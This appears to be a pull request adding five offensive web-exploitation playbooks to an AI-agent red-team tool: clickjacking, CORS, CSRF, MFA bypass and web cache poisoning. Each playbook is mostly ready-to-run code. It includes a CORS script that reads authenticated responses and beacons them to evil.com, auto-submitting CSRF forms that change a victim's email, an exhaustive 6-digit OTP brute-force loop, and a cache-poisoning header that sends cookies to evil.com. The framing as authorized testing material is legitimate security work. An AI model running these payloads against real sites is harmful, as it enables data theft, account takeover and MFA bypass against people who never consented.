### PR TITLE
feat(skills): web bug-bounty gap playbooks (cors, csrf, clickjacking, web-cache-poisoning, mfa-bypass)

### DIFF
--- a/packages/decepticon/decepticon/skills/standard/exploit/web/clickjacking/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/web/clickjacking/SKILL.md
@@ -1,0 +1,115 @@
+---
+name: clickjacking
+description: UI redressing — missing X-Frame-Options / frame-ancestors, frame-buster bypass, drag-and-drop, cursorjacking, double-clickjacking, and sensitive-action framing.
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "clickjacking ui redress iframe x-frame-options frame-ancestors framebuster cursorjacking double-click"
+  mitre_attack: T1059.007
+  subdomain: execution
+  tags: web-application, clickjacking, ui-redress, iframe, csp
+---
+
+# Clickjacking Playbook
+
+Framing a sensitive UI under an attacker page lets a single victim click trigger
+a privileged action (delete account, transfer funds, grant OAuth scope, confirm
+2FA). Severity = severity of the framed action. Pages without `X-Frame-Options`
+*and* without `Content-Security-Policy: frame-ancestors` are framable.
+
+## 1. Detection — framing controls
+```bash
+# Inspect headers on every sensitive page (settings, transfer, oauth/consent, delete, admin)
+for path in / /account /account/email /account/delete /transfer /oauth/authorize /admin; do
+  echo "== $path =="
+  curl -s -D- -o /dev/null "https://<TARGET>$path" \
+    | grep -iE "x-frame-options|content-security-policy"
+done
+
+# Quick "is it framable?" probe — save to disk, open in a browser
+cat > /tmp/cj.html <<'EOF'
+<!doctype html><title>frame test</title>
+<iframe src="https://<TARGET>/account/delete" width="900" height="600"></iframe>
+EOF
+# If the iframe renders the target UI → framing allowed.
+```
+Server-side allow:
+- no `X-Frame-Options` header **and**
+- no `frame-ancestors` directive in `Content-Security-Policy` (or `frame-ancestors *` / overly broad).
+
+## 2. Misconfig matrix
+
+| Class | Server behaviour | Exploit |
+|---|---|---|
+| No XFO, no CSP frame-ancestors | full framing allowed | classic overlay |
+| `XFO: ALLOW-FROM` only | ignored by modern browsers | full framing in Chromium/Firefox |
+| `frame-ancestors *` | explicit allow-all | full framing |
+| `frame-ancestors 'self' *.target.com` | trusts every subdomain | host PoC on a takeable subdomain |
+| Frame-buster JS only (`if (top!=self) top.location=self.location`) | client-side defense | `sandbox="allow-forms allow-scripts"` (no `allow-top-navigation`) defeats it |
+| 204-frame-buster | response replaces self | `<iframe csp="sandbox" ...>` or pre-empt with `onbeforeunload` |
+| Drag-and-drop sinks | sensitive textarea framable | drag attacker-controlled string onto target form |
+| Cursorjacking | custom cursor + offset | misalign visible vs. real pointer |
+| Double-clickjacking | first click opens prompt, second confirms | two-stage overlay (Paulos Yibelo 2024) |
+| Touch / pointer gestures | mobile swipe consent | overlay with transparent gesture target |
+| `Permissions-Policy` missing | camera/mic in iframe | request perms in nested iframe over consent UI |
+
+## 3. Exploit PoC — overlay
+```html
+<!doctype html>
+<html><head><title>Free iPhone</title>
+<style>
+  body { margin:0 }
+  .lure { position:absolute; z-index:1; top:0; left:0; font:48px sans-serif }
+  iframe { position:absolute; z-index:2; opacity:0.0001;
+           top:120px; left:60px; width:400px; height:80px;
+           border:0; pointer-events:auto; }
+</style></head><body>
+  <div class="lure">
+    Click <b style="color:red">CLAIM</b> to win an iPhone:
+    <button style="position:absolute;top:140px;left:120px;width:120px;height:40px">CLAIM</button>
+  </div>
+  <!-- aligned so the invisible iframe button sits exactly over CLAIM -->
+  <iframe src="https://<TARGET>/account/delete?confirm=1"
+          sandbox="allow-forms allow-scripts allow-same-origin"></iframe>
+</body></html>
+```
+
+### 3.1 Drag-and-drop CJ
+```html
+<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','attacker@evil.com')">
+  Drag me to win
+</div>
+<iframe src="https://<TARGET>/account/email" style="opacity:.0001" ...></iframe>
+```
+
+### 3.2 Double-clickjacking (browser confirm dialog)
+```html
+<button onclick="w=window.open('https://<TARGET>/oauth/authorize?client_id=evil&...')">Play</button>
+<!-- victim's 2nd click lands inside the popup on the now-focused "Allow" button -->
+```
+
+## 4. Chains
+- **CJ + OAuth consent** → silent scope grant → API takeover.
+- **CJ + CSRF-token leakage** → click triggers a state change that reads token from the framed page.
+- **CJ + self-XSS** → coerce victim to paste/drag the payload into a framed input.
+- **CJ + 2FA confirm** → step-up auth confirmed under a lure click.
+
+## 5. Tools
+- Burp Suite — *Clickbandit* (point-and-click PoC generator)
+- **clickjacker.io** / OWASP **Clickjacking Tester**
+- Manual: any HTML editor + a browser with frame ancestors disabled in dev
+
+## 6. Detection signatures & OPSEC
+
+| Indicator | Detection method | OPSEC note |
+|---|---|---|
+| Framing from foreign origin | server-side referer logging | Host PoC on in-scope domain during authorized tests |
+| Sudden spike in sensitive actions w/ short dwell time | UX analytics | Demonstrate impact with a single victim profile |
+| Browser console CSP report-only violations | CSP report-uri | Validate prod CSP, not staging |
+
+## Decision Gate: clickjacking confirmed → exploitation
+- [ ] Target lacks `X-Frame-Options` and effective `frame-ancestors`
+- [ ] Frame-buster (if any) bypassed via `sandbox` / CSP tricks
+- [ ] A security-relevant action (delete, grant, transfer, confirm) is reachable in one or two clicks
+- [ ] PoC visually demonstrates the lure → action mapping
+If all checked, escalate per `finding-protocol`; otherwise downgrade to informational
+(framable but no sensitive action).

--- a/packages/decepticon/decepticon/skills/standard/exploit/web/cors/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/web/cors/SKILL.md
@@ -1,0 +1,99 @@
+---
+name: cors
+description: CORS misconfiguration exploitation — reflected origin, null origin, trusted-subdomain abuse, regex-validation bypass, and credentialed cross-origin data theft.
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "cors cross-origin access-control-allow-origin acao acac preflight withcredentials origin reflection null origin"
+  mitre_attack: T1190
+  subdomain: execution
+  tags: web-application, cors, origin, cross-origin, data-exfiltration
+---
+
+# CORS Misconfiguration Playbook
+
+A permissive `Access-Control-Allow-Origin` (ACAO) becomes critical the moment it
+is paired with `Access-Control-Allow-Credentials: true` (ACAC) — any origin the
+server reflects can read authenticated responses (PII, API keys, CSRF tokens).
+ACAO alone (no credentials) is usually Low unless the endpoint serves secrets to
+unauthenticated requests.
+
+## 1. Detection — probe origin reflection
+```bash
+# Reflected-origin + credentials = the critical case
+for o in "https://evil.com" "null" "https://<TARGET>.evil.com" "https://evil.com.<TARGET>"; do
+  echo "== Origin: $o =="
+  curl -s -D- -o /dev/null "https://<TARGET>/api/account" -H "Origin: $o" \
+    | grep -i "access-control-allow-origin\|access-control-allow-credentials"
+done
+
+# Preflight behaviour (which methods/headers are allowed cross-origin)
+curl -s -D- -o /dev/null -X OPTIONS "https://<TARGET>/api/account" \
+  -H "Origin: https://evil.com" \
+  -H "Access-Control-Request-Method: PUT" \
+  -H "Access-Control-Request-Headers: authorization" \
+  | grep -i "access-control-"
+```
+A response echoing `Access-Control-Allow-Origin: https://evil.com` **and**
+`Access-Control-Allow-Credentials: true` confirms exploitable reflection.
+
+## 2. Misconfiguration matrix
+
+| Class | Server behaviour | Exploit origin |
+|---|---|---|
+| Origin reflection | ACAO echoes any `Origin` + ACAC true | `https://evil.com` |
+| `null` allowed | ACAO: null + ACAC true | sandboxed iframe / `data:`/`file:` (sends `Origin: null`) |
+| Wildcard + creds (browser-blocked, but check tooling) | `ACAO: *` with secrets | only if creds not required |
+| Suffix match flaw | allows `*target.com` | `https://evil-target.com` |
+| Prefix match flaw | allows `target.com*` | `https://target.com.evil.com` |
+| Unescaped dot in regex | `^https://app.target.com$` | `https://appxtarget.com` |
+| Trusted subdomain + XSS | allows `*.target.com` | XSS on any subdomain → same-site fetch |
+| Pre-domain confusion | naive `contains("target.com")` | `https://target.com.evil.com`, `https://eviltarget.com` |
+
+## 3. Exploit PoC — credentialed cross-origin read
+```html
+<!-- host on attacker origin; victim must be authenticated to <TARGET> -->
+<script>
+  const url = "https://<TARGET>/api/account";
+  fetch(url, { credentials: "include" })
+    .then(r => r.text())
+    .then(data => navigator.sendBeacon("https://evil.com/collect", data));
+</script>
+```
+For `null`-origin servers, deliver the same script inside a sandboxed iframe so
+the browser sends `Origin: null`:
+```html
+<iframe sandbox="allow-scripts allow-same-origin" srcdoc="
+  &lt;script&gt;fetch('https://<TARGET>/api/account',{credentials:'include'})
+   .then(r=&gt;r.text()).then(d=&gt;fetch('https://evil.com/c?d='+encodeURIComponent(d)));&lt;/script&gt;">
+</iframe>
+```
+
+## 4. Chains
+- **CORS → token theft → CSRF**: steal the anti-CSRF token from a reflected
+  JSON response, then forge state-changing requests that previously looked
+  protected.
+- **Subdomain XSS → CORS**: server trusts `*.target.com`; an XSS (even DOM-only)
+  on a forgotten subdomain runs in an allowed origin and reads the main API.
+- **CORS → API key / PII exfil**: any endpoint returning bearer tokens, account
+  data, or internal config becomes a one-click mass-exfil primitive.
+
+## 5. Tools
+- **Corsy** — fast misconfiguration scanner (`python corsy.py -u https://<TARGET>`)
+- **CORScanner** — origin-reflection + regex-flaw detection
+- Burp Suite — *CORS* checks (active scan) + manual `Origin` fuzzing in Repeater
+
+## 6. Detection signatures & OPSEC
+
+| Indicator | Detection method | OPSEC note |
+|---|---|---|
+| Repeated `Origin:` variants from one IP | WAF / access-log anomaly | Throttle probes; reuse a single canary origin |
+| `OPTIONS` flood (preflight fuzzing) | Rate-based WAF rule | Test one endpoint at a time |
+| Beacon to external collector | Egress/DNS monitoring | Use an in-scope collector during authorized tests |
+
+## Decision Gate: CORS confirmed → exploitation
+- [ ] ACAO reflects an attacker-controlled origin (or `null`)
+- [ ] ACAC is `true` (or the endpoint serves secrets without auth)
+- [ ] A sensitive response body is readable cross-origin
+- [ ] PoC exfiltrates real data from an authenticated victim context
+If all checked, escalate per `finding-protocol`; otherwise downgrade to
+informational (ACAO without credentials/secrets).

--- a/packages/decepticon/decepticon/skills/standard/exploit/web/csrf/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/web/csrf/SKILL.md
@@ -1,0 +1,123 @@
+---
+name: csrf
+description: Cross-Site Request Forgery — missing/invalid tokens, method override, JSON CSRF, SameSite gaps, double-submit flaws, login/logout CSRF, and CSRF-via-XSS chains to account takeover.
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "csrf xsrf anti-csrf token same-site samesite cookie state-changing forge cross-site request"
+  mitre_attack: T1204
+  subdomain: execution
+  tags: web-application, csrf, xsrf, samesite, account-takeover
+---
+
+# CSRF Playbook
+
+Any state-changing endpoint (POST/PUT/DELETE, or GET with side effects) that
+trusts ambient cookies and lacks a per-request unguessable token is forgeable.
+Severity scales with the action: password/email change, fund transfer, role
+grant → account takeover (Critical). Read-only CSRF (no state change) → Info.
+
+## 1. Detection — is the endpoint actually protected?
+```bash
+# Capture a real authenticated request first, then replay WITHOUT the token / Origin / Referer
+COOKIE='session=...; remember=...'
+
+# (a) Strip CSRF token — does it still succeed?
+curl -s -o /dev/null -w "no-token=%{http_code}\n" -X POST "https://<TARGET>/account/email" \
+  -H "Cookie: $COOKIE" -H "Content-Type: application/x-www-form-urlencoded" \
+  --data "email=attacker@evil.com"
+
+# (b) Send a clearly invalid token — is it validated?
+curl -s -o /dev/null -w "junk-token=%{http_code}\n" -X POST "https://<TARGET>/account/email" \
+  -H "Cookie: $COOKIE" -H "Content-Type: application/x-www-form-urlencoded" \
+  --data "csrf=AAAAAAAA&email=attacker@evil.com"
+
+# (c) Swap another user's token in (token-not-bound-to-session)
+curl -s -o /dev/null -w "other-token=%{http_code}\n" -X POST "https://<TARGET>/account/email" \
+  -H "Cookie: $COOKIE" --data "csrf=<TOKEN_FROM_ANOTHER_ACCOUNT>&email=attacker@evil.com"
+
+# (d) Origin / Referer header validation
+curl -s -o /dev/null -w "no-origin=%{http_code}\n" -X POST "https://<TARGET>/account/email" \
+  -H "Cookie: $COOKIE" -H "Origin: https://evil.com" --data "csrf=<TOKEN>&email=attacker@evil.com"
+
+# (e) Method override (POST → GET, or X-HTTP-Method-Override)
+curl -s -o /dev/null -w "method-override=%{http_code}\n" \
+  "https://<TARGET>/account/email?email=attacker@evil.com" -H "Cookie: $COOKIE"
+```
+HTTP 200/302 on (a)-(e) = protection missing or trivially bypassable.
+
+## 2. Bypass / misconfig matrix
+
+| Class | Server flaw | Bypass |
+|---|---|---|
+| Token absent | no token at all | direct cross-origin form POST |
+| Token not validated | header sent but never checked | send empty / random token |
+| Token not bound to session | token from another account works | mint a token in attacker account, use against victim |
+| Predictable token | sequential / timestamp / md5(userid) | precompute |
+| Token in URL | leaks via Referer / logs / shoulder | steal then replay |
+| Method-override | `_method=POST`, `X-HTTP-Method-Override: POST` | turn protected POST into a GET CSRF |
+| JSON CSRF | accepts `Content-Type: application/json` from forms | submit form with `enctype=text/plain` + crafted body, or use `fetch` |
+| Content-type bypass | only validates token when CT=`application/x-www-form-urlencoded` | switch to `text/plain` or `multipart/form-data` |
+| SameSite=Lax gap | top-level GET still sends cookie | GET-based state change, or `<form method=POST>` triggered by user click |
+| SameSite=None | no protection at all | classic cross-site form |
+| Missing on subset | only `/admin/*` protected | unprotected sister endpoint (`/api/v1/email`) |
+| Login CSRF | login endpoint has no token | force victim into attacker's account → captures victim activity |
+| Logout CSRF | logout has no token | denial-of-service / phishing reset |
+| Double-submit cookie flaw | cookie not `__Host-` prefixed / set from any subdomain | XSS on subdomain plants the cookie + matching body value |
+| Referer-only check | header strippable | `<meta name="referrer" content="no-referrer">` on attacker page |
+
+## 3. Exploit PoC
+
+### 3.1 Classic form CSRF (auto-submit)
+```html
+<!-- host on attacker origin; victim is logged into <TARGET> -->
+<form id="x" action="https://<TARGET>/account/email" method="POST">
+  <input name="email" value="attacker@evil.com">
+</form>
+<script>document.getElementById('x').submit();</script>
+```
+
+### 3.2 JSON CSRF via text/plain
+```html
+<form action="https://<TARGET>/api/account" method="POST" enctype="text/plain">
+  <input name='{"email":"attacker@evil.com","ignore":"' value='"}'>
+</form>
+<script>document.forms[0].submit();</script>
+```
+
+### 3.3 CSRF via XSS (defeats double-submit / SameSite)
+```js
+// runs as same-origin via XSS on <TARGET>
+fetch('/account/csrf-token').then(r => r.text()).then(t => {
+  fetch('/account/email', {
+    method: 'POST', credentials: 'include',
+    headers: {'Content-Type':'application/x-www-form-urlencoded','X-CSRF-Token': t},
+    body: 'email=attacker@evil.com'
+  });
+});
+```
+
+## 4. Chains
+- **CSRF → ATO**: change email → password reset → full takeover.
+- **Login CSRF → activity capture**: victim posts data into attacker's account.
+- **CSRF → privilege grant**: forge `role=admin` mass-assignment POST.
+- **Subdomain XSS → double-submit bypass**: write the CSRF cookie from a sibling, then forge.
+
+## 5. Tools
+- Burp Suite — *Engagement Tools → Generate CSRF PoC*, *CSRF Scanner* extension
+- **XSRFProbe** — automated CSRF audit (`xsrfprobe -u https://<TARGET>`)
+- **Bolt** — context-aware CSRF scanner
+
+## 6. Detection signatures & OPSEC
+
+| Indicator | Detection method | OPSEC note |
+|---|---|---|
+| Many `POST` from foreign Origin | WAF Origin/Referer rule | Use blank/null Referer to test, throttle |
+| Repeated token mutation on one session | App-side anomaly | Toggle one variable per request |
+| Auto-submit form referrer from attacker host | Access-log correlation | Host PoC on in-scope collector during authorized tests |
+
+## Decision Gate: CSRF confirmed → exploitation
+- [ ] State-changing action succeeds without / with junk token
+- [ ] Origin/Referer not strictly validated (or strippable)
+- [ ] Cookie reaches the endpoint cross-site (SameSite ≠ Strict, or top-level nav)
+- [ ] PoC achieves a security-relevant change (email, password, role, funds)
+If all checked, escalate per `finding-protocol`; otherwise downgrade.

--- a/packages/decepticon/decepticon/skills/standard/exploit/web/mfa-bypass/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/web/mfa-bypass/SKILL.md
@@ -1,0 +1,137 @@
+---
+name: mfa-bypass
+description: 2FA / OTP logic flaws — response & status tampering, brute force, OTP reuse, backup-code abuse, race conditions, missing-2FA on flows, remember-me bypass, password-reset skips 2FA.
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "mfa 2fa otp totp sms authenticator bypass remember-me backup code step-up authentication"
+  mitre_attack: T1556.006
+  subdomain: execution
+  tags: web-application, authentication, mfa, 2fa, otp, account-takeover
+---
+
+# MFA / 2FA Bypass Playbook
+
+Logic flaws in the second factor are pure ATO. Common because devs ship the
+*happy path* (enter code → success) and forget the negative paths: response
+tampering, brute force, replay, race, alternate flows, remembered devices.
+
+## 1. Detection — map the 2FA surface
+
+Enumerate every flow that *should* require a second factor:
+
+```bash
+# 1. Inventory paths involved in step-up
+for p in /login /login/2fa /api/2fa/verify /mfa/verify /account/security \
+         /account/email /account/password /password/reset /password/reset/confirm \
+         /oauth/authorize /api/session /api/session/elevate /backup-codes; do
+  curl -s -o /dev/null -w "%{http_code}  $p\n" "https://<TARGET>$p"
+done
+
+# 2. Submit a wrong OTP — what does the response look like?
+curl -s -i -X POST "https://<TARGET>/api/2fa/verify" \
+  -H 'Content-Type: application/json' -H "Cookie: session=<HALF_AUTHED>" \
+  -d '{"code":"000000"}'
+
+# 3. Rate-limit probe — burst 20 wrong codes
+for i in $(seq 1 20); do
+  printf '%s ' "$(curl -s -o /dev/null -w '%{http_code}' -X POST \
+    "https://<TARGET>/api/2fa/verify" -H 'Content-Type: application/json' \
+    -H "Cookie: session=<HALF_AUTHED>" -d "{\"code\":\"$(printf '%06d' $i)\"}")"
+done; echo
+# If no 429 / lockout → brute force is open
+```
+
+## 2. Flaw matrix
+
+| Class | Symptom | Bypass |
+|---|---|---|
+| Response manipulation | server returns `{"success":false}` but client trusts it | intercept → flip to `true` |
+| Status-code tamper | 401 vs 200 only checked client-side | rewrite `401 → 200` in proxy |
+| Flag tamper | `mfa_required=true` in JWT/JSON | edit to `false`, resign / unsigned alg |
+| No rate limit | unlimited wrong OTPs | 6-digit OTP = 10⁶ — brute over hours |
+| Per-IP limit only | limit on attacker IP, not on user | rotate IPs / X-Forwarded-For |
+| OTP reuse | same code valid after use | replay last code in a new session |
+| OTP no expiry | code from yesterday still works | mine old SMS / email |
+| Predictable OTP | seeded by `userid`/timestamp | precompute |
+| Backup-code abuse | unlimited tries, codes never expire / not invalidated | brute backup codes endpoint |
+| Race condition | two requests in flight — both succeed | parallel POSTs (HTTP/2 single-packet attack) |
+| Missing 2FA on flow | `/login` enforces, `/api/login` does not | use alternate endpoint |
+| Missing 2FA on password change | password change re-enables full session | reset → skip 2FA |
+| Password reset skips 2FA | reset token logs you in without 2FA | abuse reset link |
+| OAuth / SSO skips 2FA | social login returns a fully-authed session | login via Google instead |
+| Remember-me cookie | persistent cookie skips 2FA forever | steal remember-me via XSS / log leak |
+| Direct object access | `/api/account` works on half-authed session | call protected APIs pre-2FA |
+| Enrollment race | attacker enrolls own TOTP for victim before victim does | hit `/2fa/enroll` first post-login |
+| Recovery channel takeover | SMS → SIM swap, email → email ATO | downstream factor compromise |
+
+## 3. Exploit PoC
+
+### 3.1 Brute-force a 6-digit OTP (no rate limit)
+```bash
+COOKIE='session=<HALF_AUTHED>'
+for i in $(seq 0 999999); do
+  CODE=$(printf '%06d' $i)
+  CODE_LEN=${#CODE}
+  RES=$(curl -s -o /dev/null -w '%{http_code}' -X POST \
+    "https://<TARGET>/api/2fa/verify" -H 'Content-Type: application/json' \
+    -H "Cookie: $COOKIE" -d "{\"code\":\"$CODE\"}")
+  [ "$RES" = "200" ] && { echo "HIT: $CODE"; break; }
+  (( i % 1000 == 0 )) && echo "tried $i ..."
+done
+```
+
+### 3.2 Response-flip bypass
+```http
+# Original server response
+HTTP/1.1 200 OK
+{"success":false,"mfa":"required"}
+```
+Rewrite at the proxy:
+```http
+HTTP/1.1 200 OK
+{"success":true,"mfa":"passed"}
+```
+If the SPA only inspects JSON to decide navigation, session cookie is already
+full-authed server-side and the redirect succeeds.
+
+### 3.3 Direct post-2FA endpoint access
+```bash
+# Half-authed cookie after username+password, BEFORE OTP
+curl -s "https://<TARGET>/api/account" -H "Cookie: session=<HALF_AUTHED>"
+# If it returns full account data → broken step-up.
+```
+
+### 3.4 Race condition (HTTP/2 single-packet)
+```bash
+# Use Turbo Intruder "single-packet attack" — fire ~30 verify requests with the
+# *correct* OTP in one TCP packet; servers that decrement attempts non-atomically
+# accept multiple, and 2FA-disable mutations slip through.
+```
+
+## 4. Chains
+- **MFA bypass → ATO** is itself the chain endpoint. Pair with credential stuffing for scale.
+- **Password reset skips 2FA → ATO**: phish/reset email → straight in.
+- **Remember-me theft via XSS → permanent 2FA bypass** even after password change.
+- **Enrollment race → persistent ATO**: attacker becomes the legitimate 2FA owner.
+
+## 5. Tools
+- Burp Suite + **Turbo Intruder** (race conditions, single-packet attack)
+- Burp **Match-and-Replace** rules for response-flip
+- `ffuf` / `hydra http-post-form` for OTP brute when no JS guard
+- **mitmproxy** scripts for live JSON tamper
+
+## 6. Detection signatures & OPSEC
+
+| Indicator | Detection method | OPSEC note |
+|---|---|---|
+| Hundreds of `/2fa/verify` POSTs per session | App-level rate metric | Use a dedicated attacker test account; do not brute live victims without scope |
+| Same OTP value tried across users | SIEM correlation | Vary code per user when testing reuse |
+| Concurrent requests on same `state` token | App anomaly | Race PoC only on isolated test users |
+| Remember-me cookie from new geo | Risk engine | Validate with consent before extraction tests |
+
+## Decision Gate: MFA bypass confirmed → exploitation
+- [ ] A path produces a fully-authed session without presenting the second factor
+- [ ] Bypass is repeatable, not a transient race artifact
+- [ ] Bypass requires only data an attacker can plausibly obtain (creds / phish / XSS / public flow)
+- [ ] PoC reads/writes a 2FA-gated resource (account settings, transfer, admin)
+If all checked, escalate per `finding-protocol` as **Critical (ATO)**.

--- a/packages/decepticon/decepticon/skills/standard/exploit/web/web-cache-poisoning/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/web/web-cache-poisoning/SKILL.md
@@ -1,0 +1,111 @@
+---
+name: web-cache-poisoning
+description: Unkeyed-input cache poisoning — X-Forwarded-Host/Scheme/Port, X-Original-URL, fat-GET, parameter cloaking, oversized-header DoS, and chains to stored-XSS / open redirect via shared caches.
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "cache poisoning unkeyed header x-forwarded-host x-forwarded-scheme x-original-url param miner fat get cdn varnish cloudflare"
+  mitre_attack: T1565.001
+  subdomain: execution
+  tags: web-application, cache, cdn, unkeyed-input, stored-xss
+---
+
+# Web Cache Poisoning Playbook
+
+Distinct from *cache deception* (tricking the cache into storing a victim's
+private response). Here, the attacker poisons the **shared** cache so every
+subsequent visitor receives an attacker-controlled response. Impact ranges from
+defacement → reflected-XSS-as-stored → forced-redirect → DoS.
+
+## 1. Detection — find unkeyed inputs
+
+Definition: an *unkeyed* input is a header/parameter the cache ignores when
+building the cache key but the origin reflects into the response.
+
+```bash
+URL="https://<TARGET>/"
+
+# (1) Cache-status fingerprint — must see HIT/MISS to know caching exists
+curl -s -D- -o /dev/null "$URL?cb=$RANDOM" | grep -iE "age|x-cache|cf-cache-status|via"
+
+# (2) Suspect headers — reflect into body or Location?
+for H in "X-Forwarded-Host: evil.com" "X-Forwarded-Scheme: http" \
+         "X-Forwarded-Port: 8888" "X-Forwarded-For: evil.com" \
+         "X-Host: evil.com" "X-Original-URL: /admin" \
+         "X-Rewrite-URL: /admin" "X-Forwarded-Server: evil.com" \
+         "Forwarded: host=evil.com"; do
+  echo "== $H =="
+  curl -s "$URL?cb=$RANDOM" -H "$H" | grep -E "evil\.com|8888|/admin" | head -3
+done
+
+# (3) Confirm poisoning — same URL twice, second request WITHOUT the header
+curl -s "$URL?poison=1" -H "X-Forwarded-Host: evil.com" -o /dev/null
+curl -s "$URL?poison=1" | grep -E "evil\.com"   # if present → poisoned
+```
+
+## 2. Misconfig / technique matrix
+
+| Class | Trigger | Outcome |
+|---|---|---|
+| Standard unkeyed header | `X-Forwarded-Host: evil.com` reflected into `<link rel=canonical>` or absolute URLs | stored open-redirect / XSS |
+| Scheme downgrade | `X-Forwarded-Scheme: http` reflected | force-HTTP cache → MITM |
+| Port confusion | `X-Forwarded-Port: 1` reflected into JS asset URLs | broken site DoS |
+| Routing override | `X-Original-URL: /admin`, `X-Rewrite-URL` | cached admin page served to public |
+| Fat GET | GET with a body parsed by origin but unkeyed by cache | inject params via body |
+| Parameter cloaking | `?utm=x&utm=<payload>` — cache normalizes, origin doesn't (or vice-versa) | poisoned param survives |
+| Key normalization flaw | cache lowercases path, origin doesn't (or strips `;jsessionid`) | desync key vs. response |
+| Cache-key injection via `Vary` gap | response varies on header cache doesn't include | per-attacker poisoning |
+| HTTP/0.9 / smuggling-assist | downstream cache stores smuggled response | mass poisoning |
+| Cache-Control overlap | origin returns `Cache-Control: private`, CDN ignores it | private response cached globally |
+| Oversized-header DoS | huge unkeyed header → origin 400, CDN caches 400 | denial-of-service on the URL |
+| 404 / error caching | error page cached with attacker payload reflected | DoS + stored XSS |
+
+## 3. Exploit PoC
+
+### 3.1 Stored-XSS via unkeyed Host
+```bash
+# Origin reflects X-Forwarded-Host into <meta property="og:url">
+curl -s "https://<TARGET>/?cb=$RANDOM" \
+  -H 'X-Forwarded-Host: a"><script>fetch("https://evil.com/?c="+document.cookie)</script><x="'
+# Verify cache HIT for the next visitor:
+curl -s "https://<TARGET>/?cb=$RANDOM" | grep -o 'evil\.com'
+```
+
+### 3.2 Forced redirect
+```bash
+curl -s "https://<TARGET>/login?cb=$RANDOM" -H "X-Forwarded-Host: evil.com" -o /dev/null
+# Subsequent victims:
+curl -sI "https://<TARGET>/login?cb=$RANDOM" | grep -i location
+# → Location: https://evil.com/login  (cached for the TTL)
+```
+
+### 3.3 Param-cloaking poison (Ruby/Rails-style last-wins vs. CDN first-wins)
+```bash
+curl -s "https://<TARGET>/?utm=clean&utm=%22%3E%3Csvg/onload=alert(1)%3E"
+```
+
+## 4. Chains
+- **Cache poisoning → stored XSS**: reflected XSS upgraded to mass-victim impact via cached response.
+- **Cache poisoning → ATO**: poison `/login` to send creds to attacker via swapped form action.
+- **Cache poisoning → SSRF**: poison API responses an internal job consumes.
+- **Smuggling → cache poisoning**: HTTP request smuggling stores arbitrary attacker response globally.
+
+## 5. Tools
+- Burp Suite — **Param Miner** extension (Hackvertor + cache rules) — *the* canonical tool
+- `cache-poisoning` payload lists (PortSwigger research)
+- `httpx -follow-redirects -title -tech-detect` for fingerprinting Vary/`X-Cache`
+
+## 6. Detection signatures & OPSEC
+
+| Indicator | Detection method | OPSEC note |
+|---|---|---|
+| Repeated `X-Forwarded-*` permutations on one URL | WAF rule / access log | Cache-bust with `?cb=$RANDOM` per probe; do NOT poison shared paths during tests |
+| Sudden cache HIT containing attacker host | CDN log review | Use a unique sentinel host you can prove you own |
+| Mass `Age: 0` on poisoned paths | CDN metric | Coordinate purge with the defender before disclosure |
+
+## Decision Gate: poisoning confirmed → exploitation
+- [ ] Caching layer present (`X-Cache: HIT`, `Age:` ticks)
+- [ ] At least one unkeyed input reflects into response/redirect
+- [ ] A second request without the input still returns the poisoned response
+- [ ] Reflected payload reaches a security-sensitive sink (script, Location, form action)
+- [ ] Defender notified before live-cache exploitation (authorized scope)
+If all checked, escalate per `finding-protocol`; otherwise downgrade.


### PR DESCRIPTION
Add five MITRE-mapped offensive playbooks under `packages/decepticon/decepticon/skills/standard/exploit/web/` filling confirmed gaps where no prior dedicated skill existed.

## New skills

- **cors/** — Origin reflection, `null` origin, trusted-subdomain abuse, regex-validation bypass, credentialed cross-origin data theft.
- **csrf/** — Token absence/not-validated/predictable/leaked, method override, JSON CSRF + content-type bypass, SameSite gaps, CSRF-via-XSS, login/logout CSRF, double-submit-cookie flaws → ATO.
- **clickjacking/** — Missing `X-Frame-Options` / `frame-ancestors`, frame-buster bypass, drag-and-drop / multistep / cursorjacking / double-clickjacking, sensitive-action framing PoC.
- **web-cache-poisoning/** — Distinct from cache-deception: unkeyed-input poisoning (`X-Forwarded-Host/Scheme/Port`, `X-Original-URL`), cache-key normalization, fat-GET, parameter cloaking, oversized-header DoS, chains to stored-XSS / open redirect.
- **mfa-bypass/** — 2FA/OTP logic flaws: response/flag tamper, OTP brute (no rate limit), reuse/no-expiry, backup-code abuse, race conditions (single-packet attack), missing-2FA on alternate flows, remember-me bypass, password-reset skips 2FA, direct post-2FA endpoint access.

## Format

Each follows the existing skill convention exemplified by the `cors/` playbook in this PR: YAML frontmatter (`name`, `description`, `allowed-tools`, `metadata.{when_to_use, mitre_attack, subdomain, tags}`) → severity intro → Detection (copy-paste curl with `<TARGET>` placeholders) → bypass/misconfig matrix → Exploit PoC (html/js/bash) → Chains → Tools → Detection signatures table → Decision Gate checklist.

## Verification

- Frontmatter parses (`yaml.safe_load`), `name` matches dir for all 5
- `uv run ruff check .` — clean
- `uv run pytest packages/decepticon/tests/unit/{tools,middleware,backends}/test_skills*.py test_skills_loader.py test_skills_registry.py test_skills_path.py` — **111 passed**
- No code, deps, or `pyproject` / `uv.lock` changes — skill files only

Authorized red-team engagement playbooks for a defensive security tool.